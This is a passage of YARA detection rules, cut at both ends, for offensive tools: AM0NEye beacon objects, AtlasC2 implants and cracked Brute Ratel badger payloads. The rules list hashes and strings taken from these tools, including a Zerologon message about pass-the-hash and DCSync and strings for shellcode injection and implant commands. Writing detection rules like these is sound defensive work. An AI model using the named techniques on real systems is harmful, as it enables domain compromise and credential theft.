      hash.sha256(0, filesize) == "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb" or
      uint16(0) == 0x8664 and filesize < 20KB and
      1 of ($x*) and 4 of them
}

rule AM0NEye_UnhookX86 {
   meta:
      description = "AM0NEye - unhook.x86.o"
      sha256 = "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88"
   strings:
      $s1  = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x86.o" fullword ascii
      $s2  = "_GetProcessEnvironmentBlock" fullword ascii
      $s3  = "__imp__KERNEL32$GetModuleHandleW@4" fullword ascii
      $s4  = "__imp__KERNEL32$VirtualProtect@16" fullword ascii
      $s5  = "__imp__KERNEL32$CreateFileMappingW@24" fullword ascii
      $s6  = "_CustomGetModuleHandleW" fullword ascii
      $s7  = "__imp__KERNEL32$MapViewOfFile@20" fullword ascii
      $s8  = "_GetRedirectedName_V6" fullword ascii
      $s9  = "__imp__KERNEL32$CloseHandle@4" fullword ascii
      $s10 = "__imp__KERNEL32$UnmapViewOfFile@4" fullword ascii
      $s11 = "__imp__KERNEL32$LoadLibraryW@4" fullword ascii
      $s12 = "_GetRedirectedName" fullword ascii
      $s13 = "_GetInMemoryOrderModuleList" fullword ascii
      $s14 = "_IsBeaconDLL" fullword ascii
      $s15 = "__imp__KERNEL32$CreateFileW@28" fullword ascii
      $s16 = "__imp__KERNEL32$VirtualAlloc@16" fullword ascii
      $s17 = "_GetRedirectedName_V2" fullword ascii
      $s18 = "_GetRedirectedName_V4" fullword ascii
      $s19 = "__imp__KERNEL32$VirtualFree@12" fullword ascii
      $s20 = "_CustomGetProcAddressEx@12" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88" or
      uint16(0) == 0x014c and filesize < 20KB and
      8 of them
}

rule AM0NEye_ZerologonX64 {
   meta:
      description = "AM0NEye - zerologon.x64.o"
      sha256 = "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413"
   strings:
      $s1  = "z:\\devcenter\\zerologon\\dist\\zerologon.x64.o" fullword ascii
      $s2  = "%S is not vulnerable" fullword ascii
      $s3  = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" fullword ascii
      $s4  = "__imp_NETAPI32$I_NetServerPasswordSet2" fullword ascii
      $s5  = "Failed to set machine account pass for %S" fullword ascii
      $s6  = "0@   /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " fullword ascii
      $s7  = "@comp.id}y" fullword ascii
      $s8  = "B.data" fullword ascii
      $s9  = "$unwind$go" fullword ascii
      $s10 = "$pdata$go" fullword ascii
      $s11 = "__imp_NETAPI32$I_NetServerReqChallenge" fullword ascii
      $s12 = "__imp_NETAPI32$I_NetServerAuthenticate2" fullword ascii
      $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" ascii
      $s14 = "P`.xdata" fullword ascii
      $s15 = "Microsoft (R) Optimizing Compiler" fullword ascii
      $s16 = "$SG87893H" fullword ascii
      $s17 = "$SG87894x" fullword ascii
      $s18 = "$SG87891" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413" or
      uint16(0) == 0x8664 and filesize < 5KB and
      8 of them
}

rule AM0NEye_ZerologonX86 {
   meta:
      description = "AM0NEye - zerologon.x86.o"
      sha256 = "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07"
   strings:
      $s1 = "Z:\\devcenter\\zerologon\\dist\\zerologon.x86.o" fullword ascii
      $s2 = "%S is not vulnerable" fullword ascii
      $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" fullword ascii
      $s4 = "__imp__NETAPI32$I_NetServerPasswordSet2" fullword ascii
      $s5 = "Failed to set machine account pass for %S" fullword ascii
      $s6 = "P`   /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " fullword ascii
      $s7 = "@comp.id}y" fullword ascii
      $s8 = "B.data" fullword ascii
      $s9 = "__imp__BeaconDataExtract" fullword ascii
      $s10 = "__imp__BeaconPrintf" fullword ascii
      $s11 = "__imp__BeaconDataParse" fullword ascii
      $s12 = "__imp__NETAPI32$I_NetServerReqChallenge" fullword ascii
      $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" ascii
      $s14 = "__imp__NETAPI32$I_NetServerAuthenticate2" fullword ascii
      $s15 = "Microsoft (R) Optimizing Compiler" fullword ascii
      $s16 = "$SG87301" fullword ascii
      $s17 = "$SG87303H" fullword ascii
      $s18 = "$SG87304t" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07" or
      uint16(0) == 0x014c and filesize < 4KB and
      8 of them
}

rule AM0NEye_CurlX86 {
   meta:
      description = "AM0NEye - curl.x86.o"
      sha256 = "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4"
   strings:
      $s1 = "User Agent: %s" fullword ascii
      $s2 = "__imp__KERNEL32$lstrlenA@4" fullword ascii
      $s3 = "Retrieving HTTP Request info failed" fullword ascii
      $s4 = "__imp__WININET$HttpSendRequestA@20" fullword ascii
      $s5 = "__imp__WININET$InternetReadFile@16" fullword ascii
      $s6 = "__imp__WININET$HttpQueryInfoA@20" fullword ascii
      $s7 = "__imp__WININET$HttpOpenRequestA@32" fullword ascii
      $s8 = "%s %s:%i %s" fullword ascii
      $s9 = "Response Code: %s" fullword ascii
      $s10 = "entry.c" fullword ascii
      $s11 = "No response." fullword ascii
      $s12 = "__imp__BeaconDataInt" fullword ascii
      $s13 = "__imp__WININET$InternetCloseHandle@4" fullword ascii
      $s14 = "__imp__WININET$InternetOpenA@20" fullword ascii
      $s15 = "__imp__BeaconDataExtract" fullword ascii
      $s16 = "__imp__WININET$InternetConnectA@32" fullword ascii
      $s17 = "__imp__MSVCRT$strtok" fullword ascii
      $s18 = "__imp__MSVCRT$strcmp" fullword ascii
      $s19 = "__imp__BeaconPrintf" fullword ascii
      $s20 = "__imp__BeaconDataParse" fullword ascii
   condition:
      hash.sha256(0, filesize) == "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4" or
      uint16(0) == 0x014c and filesize < 9KB and
      8 of them
}

rule AM0NEye_SyscallsapcspawnX64 {
   meta:
      description = "AM0NEye - syscallsapcspawn.x64.o"
      sha256 = "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61"
   strings:
      $s1  = "Shellcode injection completed successfully!" fullword ascii
      $s2  = "__imp_BeaconSpawnTemporaryProcess" fullword ascii
      $s3  = "Failed to spawn process." fullword ascii
      $s4  = "InjectShellcode" fullword ascii
      $s5  = "Failed to spawn process. Exiting..." fullword ascii
      $s6  = "NtResumeThread - FAILED! %08X" fullword ascii
      $s7  = "Spawned Process with PID: %d" fullword ascii
      $s8  = "NtQueueApcThread - FAILED! %08X" fullword ascii
      $s9  = "__imp_BeaconCleanupProcess" fullword ascii
      $s10 = "NtUnmapViewOfSection - FAILED! %08X" fullword ascii
      $s11 = "NtCreateSection - FAILED! %08X" fullword ascii
      $s12 = "NtMapViewOfSection2 - FAILED! %08X" fullword ascii
      $s13 = "NtMapViewOfSection - FAILED! %08X" fullword ascii
      $s14 = "SW2_GetSyscallNumber" fullword ascii
      $s15 = "entry.c" fullword ascii
      $s16 = "__imp_MSVCRT$memcpy" fullword ascii
      $s17 = "__imp_BeaconDataLength" fullword ascii
      $s18 = "SW2_HashSyscall" fullword ascii
      $s19 = "GCC: (GNU) 10-win32 20200525" fullword ascii
      $s20 = "0@.rdata" fullword ascii
   condition:
      hash.sha256(0, filesize) == "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61" or
      uint16(0) == 0x8664 and filesize < 30KB and
      8 of them
}

rule AM0NEye_PopCalc {
   meta:
      description = "AM0NEye - popCalc.bin"
      sha256 = "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca"
   strings:
      $s1 = "AQAPRQVH1" fullword ascii
      $s2 = "AXAX^YZAXAYAZH" fullword ascii
      $s3 = "calc.exe" fullword ascii
   condition:
      hash.sha256(0, filesize) == "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca" or
      uint16(0) == 0x48fc and filesize < 1KB and
      all of them
}


- Atlas C2

import "hash"
import "pe"

rule AtlasC2_ClientDll {
   meta:
      description = "AtlasC2 - Client.dll"
      sha256 = "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d"
   strings:
      $x1  = "Executes a command in the context of cmd.exe" fullword wide
      $x2  = "Execute a PS command using the PS DLLs" fullword wide
      $s3  = "command to execute" fullword wide
      $s4  = "Client.dll" fullword wide
      $s5  = "[*] Usage: RmDir [targetDir]" fullword wide
      $s6  = "[*] Usage: RmFile [targetFile]" fullword wide
      $s7  = "Fetch user id of user running implant process" fullword wide
      $s8  = "<UtilExecute>b__0" fullword ascii
      $s9  = "UtilExecute" fullword ascii
      $s10 = "<UtilExecute>b__8_0" fullword ascii
      $s11 = "ExecuteAssemMethod" fullword wide
      $s12 = "ExecuteAssem" fullword wide
      $s13 = "[*] Usage: Getuid" fullword wide
      $s14 = "Execute a specifed assem type from its entry point" fullword wide
      $s15 = "Executes specified method belonging to a loaded assem type" fullword wide
      $s16 = "[-] Connection to teamserver could not be established or no implant currently set" fullword wide
      $s17 = "path to PowerShell file to load into implant process" fullword wide
      $s18 = "byte array to load into implant process" fullword wide
      $s19 = "System.ComponentModel.Primitives" fullword ascii
      $s20 = "System.Net.WebClient" fullword ascii
   condition:
      hash.sha256(0, filesize) == "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d" or
      uint16(0) == 0x5a4d and filesize < 100KB and
      1 of ($x*) and 4 of them
}

rule AtlasC2_Implant {
   meta:
      description = "AtlasC2 - Implant.exe"
      sha256 = "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09"
   strings:
      $s1  = "Implant.Tasks.Execute" fullword ascii
      $s2  = "Implant.exe" fullword wide
      $s3  = "ExecuteAssemMethod" fullword wide
      $s4  = "ExecuteAssem" fullword wide
      $s5  = "ExecuteAssemEP" fullword ascii
      $s6  = " loaded into implant process" fullword wide
      $s7  = "(Implant.Models.HTTPComms+<PostData>d__18" fullword ascii
      $s8  = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s9  = "<targetDir>k__BackingField" fullword ascii
      $s10 = "get_targetFile" fullword ascii
      $s11 = "set_targetDir" fullword ascii
      $s12 = "<targetFile>k__BackingField" fullword ascii
      $s13 = "get_targetDir" fullword ascii
      $s14 = "set_targetFile" fullword ascii
      $s15 = "GetHostIP" fullword ascii
      $s16 = "<targetPath>k__BackingField" fullword ascii
      $s17 = "get_Encoded" fullword ascii
      $s18 = "set_targetPath" fullword ascii
      $s19 = "ImplantCommands" fullword ascii
      $s20 = "set_UseShellExecute" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 100KB and
      8 of them
}

rule AtlasC2_Client {
   meta:
      description = "AtlasC2 - Client.exe"
      sha256 = "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\standalone\\Release\\apphost.pdb" fullword ascii
      $s5  = "Client.dll" fullword wide
      $s6  = "  - %s&apphost_version=%s" fullword wide
      $s7  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s8  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s9  = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s'" fullword wide
      $s10 = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s11 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s12 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s13 = "        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" fullword ascii
      $s14 = "  - Installing .NET prerequisites might help resolve this problem." fullword wide
      $s15 = "  - https://aka.ms/dotnet-core-applaunch?" fullword wide
      $s16 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s17 = "The required library %s does not support relative app dll paths." fullword wide
      $s18 = "Failed to read environment variable [%s], HRESULT: 0x%X" fullword wide
      $s19 = "The application to execute does not exist: '%s'." fullword wide
      $s20 = "apphost" fullword wide
   condition:
      hash.sha256(0, filesize) == "3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 400KB and
      8 of them
}


- BruteRatel

The detection rule is built for educational purposes for unlicensed (abused), cracked, and underground versions. The legitimate version of BT will not be detected using this rule and is oriented toward cybersecurity professionals and red team specialists.

import "hash"
import "pe"
import "math"

rule BruteRatel_BadgerDll_x64 {
   meta:
      description = "BruteRatel - badger_x64.dll"
      sha256_1 = "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307"
      sha256_2 = "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e"
   strings:
      $s1  = "HK2PVH1A.dll" fullword ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "$K~D:\\" fullword ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "^CN:\\Z" fullword ascii
      $s7  = "AYAXZYPAQH" fullword ascii
      $s8  = "AWAVAUATM" fullword ascii
      $s9  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s10 = " -9.6p" fullword ascii
      $s11 = "fv* VE" fullword ascii
      $s12 = "> /Mq/" fullword ascii
      $s13 = "ygfL,.'" fullword ascii
      $s14 = "POIOWiAu" fullword ascii
      $s15 = "^(d{f>v AXQRAPAQL" fullword ascii
      $s16 = "GxnyNxL" fullword ascii
      $s17 = "UQAi1qv" fullword ascii
      $s18 = "tJmyU}1" fullword ascii
      $s19 = "!qtel-oT" fullword ascii
      $s20 = "QRDJB2Q" fullword ascii
      $s21 = "C3OQGC2D.dll" fullword ascii
      $s22 = "AYAXZYPAQH" fullword ascii
   condition:
      hash.sha256(0, filesize) == "2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307" or
      hash.sha256(0, filesize) == "e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x64_RtlExitUserThread {
   meta:
      description = "BruteRatel - badger_x64_RtlExitUserThread.bin"
      sha256_1 = "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8"
      sha256_2 = "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "tpGb#_," fullword ascii
      $s4  = "OEvy[)q" fullword ascii
      $s5  = "pmiSTvdy" fullword ascii
      $s6  = "TaLcDw;lI" fullword ascii
      $s7  = "MrVeO[9" fullword ascii
      $s8  = "WUtEFwQX" fullword ascii
      $s9  = "9WVZeLFi" fullword ascii
      $s10 = "eIvV0h+" fullword ascii
      $s11 = "zllG!r*" fullword ascii
      $s12 = "mZnFr_." fullword ascii
      $s13 = "sLIv9`0T" fullword ascii
      $s14 = "$vufz?" fullword ascii
      $s15 = "Q5/*}@}ud%AXQRAPAQL" fullword ascii
      $s16 = "AWAVAUATWVH" fullword ascii
      $s17 = "oaNpx3" fullword ascii
      $s18 = "\\0X/pa" fullword ascii
      $s19 = "VfaFB0" fullword ascii
      $s20 = "\\x(BEI" fullword ascii
      $s21 = "ZgaoJ,9" fullword ascii
      $s22 = "IpKSfvlR" fullword ascii
      $s23 = "d%>d$/:iAXQRAPAQL" fullword ascii
      $s24 = "/Yesbu/6" fullword ascii
      $s25 = "teXrmE<" fullword ascii
   condition:
      hash.sha256(0, filesize) == "6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8" or
      hash.sha256(0, filesize) == "1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      6 of them
}

rule BruteRatel_BadgerService_x64 {
   meta:
      description = "BruteRatel - badger_x64_service.exe"
      sha256_1 = "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8"
      sha256_2 = "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s7  = "TransactionBrokerService" fullword ascii
      $s8  = "AYAXZYPAQH" fullword ascii
      $s9  = "AWAVAUATM" fullword ascii
      $s10 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s11 = "\\BeiSp /" fullword ascii
      $s12 = "BZ' -aH" fullword ascii
      $s13 = ">qP'4- J>" fullword ascii
      $s14 = ":MZuWHcB<H" fullword ascii
      $s15 = "JNacN'j" fullword ascii
      $s16 = "'BYMX?k" fullword ascii
      $s17 = "!FruL1ZLWlM9" fullword ascii
      $s18 = "oRvNu7I" fullword ascii
      $s19 = "oqd!a #saAXQRAPAQL" fullword ascii
      $s20 = "c-QVpl*bUM" fullword ascii
   condition:
      hash.sha256(0, filesize) == "361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8" or
      hash.sha256(0, filesize) == "9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthBin_x64_RtlExitUserThread {
   meta:
      description = "BruteRatel - badger_x64_stealth_RtlExitUserThread.bin"
      sha256_1 = "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c"
      sha256_2 = "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "bhfSv!6" fullword ascii
      $s5  = "VrdJrcU" fullword ascii
      $s6  = "tXRC4DCWt" fullword ascii
      $s7  = "6rhfN^4qyW" fullword ascii
      $s8  = "kejA\"'" fullword ascii
      $s9  = "LgVSX[4>" fullword ascii
      $s10 = "CXaAb4D6" fullword ascii
      $s11 = "XjXxiQ?" fullword ascii
      $s12 = "MOpm~vr" fullword ascii
      $s13 = "mmq&e$ddAXQRAPAQL" fullword ascii
      $s14 = "Jiysu^[r" fullword ascii
      $s15 = "_(t.oGR" fullword ascii
      $s16 = "tKTU7!2" fullword ascii
      $s17 = "xUdcmD" fullword ascii
      $s18 = "|owVVk)DK" fullword ascii
      $s19 = "EtPevsx" fullword ascii
      $s20 = "samgQ\"" fullword ascii
      $s21 = ".sWP&|" fullword ascii
      $s22 = "\"(hvLZ\\wE" fullword ascii
      $s23 = ",.MMgQ)y<" fullword ascii
      $s24 = "+ l%(U^u" fullword ascii
      $s25 = "SxjTLZ2" fullword ascii
      $s26 = "OJQx>$-=" fullword ascii
      $s27 = "|JXPC}5Q" fullword ascii
   condition:
      hash.sha256(0, filesize) == "c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c" or
      hash.sha256(0, filesize) == "ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthService_x64 {
   meta:
      description = "BruteRatel - badger_x64_stealth_service.exe"
      sha256 = "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "pggmopa" fullword ascii
      $s6  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s7  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s8  = "TransactionBrokerService" fullword ascii
      $s9  = "AYAXZYPAQH" fullword ascii
      $s10 = "AWAVAUATM" fullword ascii
      $s11 = "AWAVAUM" fullword ascii
      $s12 = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s13 = "p62%q%" fullword ascii
      $s14 = "yqfgcr0" fullword ascii
      $s15 = ":MZuWHcB<H" fullword ascii
      $s16 = "V_XgIY!*" fullword ascii
      $s17 = "chPcT0X" fullword ascii
      $s18 = "kVea&{(" fullword ascii
      $s19 = "R?vnooO]L" fullword ascii
      $s20 = "rQPx[,D" fullword ascii
   condition:
      hash.sha256(0, filesize) == "78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerStealthBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x64_stealth_WaitForSingleObject.bin"
      sha256_1 = "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c"
      sha256_2 = "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df"
   strings:
      $s1  = "-},p:\\" fullword ascii
      $s2  = "AYAXZYPAQH" fullword ascii
      $s3  = "AWAVAUATM" fullword ascii
      $s4  = "AWAVAUM" fullword ascii
      $s5  = "\\o /No" fullword ascii
      $s6  = "mRCBh0e" fullword ascii
      $s7  = "iIHGF\\(" fullword ascii
      $s8  = "@$$)#|v}AXQRAPAQL" fullword ascii
      $s9  = "QaLb5+y" fullword ascii
      $s10 = "DsWN8F\\L" fullword ascii
      $s11 = "EscU,yQPaeB" fullword ascii
      $s12 = "|XRTiqS{" fullword ascii
      $s13 = "MXxG)]q" fullword ascii
      $s14 = "zesf!ub" fullword ascii
      $s15 = "_riizb_6" fullword ascii
      $s16 = "BABqh\\" fullword ascii
      $s17 = "xFMD@CH" fullword ascii
      $s18 = "eAtA_b-" fullword ascii
      $s19 = "R$.Naq" fullword ascii
      $s20 = "gQId?99<" fullword ascii
      $s21 = "N!^ /O" fullword ascii
      $s22 = "AqckaG(c" fullword ascii
      $s23 = "=ESzR=LH" fullword ascii
      $s24 = "50szmET|E" fullword ascii
      $s25 = "}- 0I$e" fullword ascii
   condition:
      hash.sha256(0, filesize) == "efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c" or
      hash.sha256(0, filesize) == "f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x64_WaitForSingleObject.bin"
      sha256_1 = "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666"
      sha256_2 = "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c"
   strings:
      $s1  = "AYAXZYPAQH" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "&.fm#a:dAXQRAPAQL" fullword ascii
      $s4  = "~AZV_gPPs&fZv" fullword ascii
      $s5  = "OrDnmSl" fullword ascii
      $s6  = "Onnn\"-" fullword ascii
      $s7  = "xDAX!X" fullword ascii
      $s8  = "RWaBcGu" fullword ascii
      $s9  = "1zpfd?" fullword ascii
      $s10 = "vUdc7TN" fullword ascii
      $s11 = "vQkR~oN' " fullword ascii
      $s12 = "x/sGxaW'O" fullword ascii
      $s13 = "tNwRf-'" fullword ascii
      $s14 = "fQBS\"W" fullword ascii
      $s15 = "LTEU0AA" fullword ascii
      $s16 = "s-.RBA@K" fullword ascii
      $s17 = "Gwsl\\U:p" fullword ascii
      $s18 = "75.yHG" fullword ascii
      $s19 = "SAHW&Nm" fullword ascii
      $s20 = "+uCLL't~Y_$(iW" fullword ascii
      $s21 = ";=%i3ta" fullword ascii
      $s22 = "X>,%S3x" fullword ascii
      $s23 = "hVIz)0a" fullword ascii
      $s24 = "uWrB~MB*vi=" fullword ascii
      $s25 = "aAkXv&Z" fullword ascii
      $s27 = "EnZl5%*" fullword ascii
      $s28 = "wsbnuob%" fullword ascii
   condition:
      hash.sha256(0, filesize) == "8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666" or
      hash.sha256(0, filesize) == "f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0x8348 and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerDll_x86 {
   meta:
      description = "BruteRatel - badger_x86.dll"
      sha256_1 = "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac"
      sha256_2 = "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278"
   strings:
      $s1  = "F5M5INBS.dll" fullword ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "4!535?5f5{5" fullword ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "cH:\"+SY" fullword ascii
      $s7  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s8  = "TaNnOhb" fullword ascii
      $s9  = ")warvr6f" fullword ascii
      $s10 = "3;WiFF!S" fullword ascii
      $s11 = "VMbw`iC)" fullword ascii
      $s12 = "HvbS29@~\\A" fullword ascii
      $s13 = "WkCox*V%" fullword ascii
      $s14 = "WbkiPR%" fullword ascii
      $s15 = "ywTl=lQu" fullword ascii
      $s16 = "RCyDgt/" fullword ascii
      $s17 = "_SGimRpH" fullword ascii
      $s18 = "Gypy?#W" fullword ascii
      $s19 = "rKNW\\$D" fullword ascii
      $s20 = "QGTZx.\"" fullword ascii
      $s21 = "/ird_%k%vy?" fullword ascii
      $s22 = "zbMDO01" fullword ascii
      $s23 = "]Xbych4o" fullword ascii
      $s24 = "TNUu!E <" fullword ascii
      $s25 = "vSpZ3A3" fullword ascii
      $s26 = "stXi}G<" fullword ascii
      $s27 = "gkms\\#" fullword ascii
      $s28 = "V\\bhaV!" fullword ascii
      $s29 = "ZrJqHBf`" fullword ascii
   condition:
      hash.sha256(0, filesize) == "434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac" or
      hash.sha256(0, filesize) == "a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "GetNativeSystemInfo") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x86_RtlExitUserThread {
   meta:
      description = "BruteRatel - badger_x86_RtlExitUserThread.bin"
